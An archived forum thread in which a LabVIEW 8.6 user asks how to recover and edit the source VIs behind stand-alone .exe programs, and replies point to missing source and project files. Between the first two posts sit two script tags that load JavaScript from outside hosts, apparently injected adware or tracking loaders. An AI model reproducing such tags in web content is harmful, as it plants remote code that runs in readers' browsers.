10-27-2012 01:22 PM
I'm running Labview 8.6. Our electronics tech recently left, he created several .exe stand-alone programs to run on different platforms. I need to go see the back panel and understand how it works as well as be able to edit it. I realize the .exe file can't do that, how do I track down the VI that the .exe was originally created in so I can see the structure and edit as necessary? Or can I open the .exe file in application builder and manipulate it. I have searched labview and the forums and haven't been able to find an answer related to this yet. Thanks.
<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>10-27-2012 02:23 PM
It's not permitted for security reasons.
http://digital.ni.com/public.nsf/allkb/8545726A00272EB0862571DA005B896C
You should try to find the source vi's or re-implement the functionality.
Br,
/Roger
10-29-2012 02:55 PM
Perhaps this would be helpful.
Place the .llb in the same folder as the .exe.
Open the .llb and run App_Probe.vi
You can see the names of the source .VI and .Ctl files, and access their properties.
10-29-2012 03:32 PM
Basically you need to find the source code and open up the project file, there are the definitions or what VI's were used the how it's compiled.
A .exe always removes the block diagram so you cant check the back panel even if you could access vi's inside an .exe.
/Y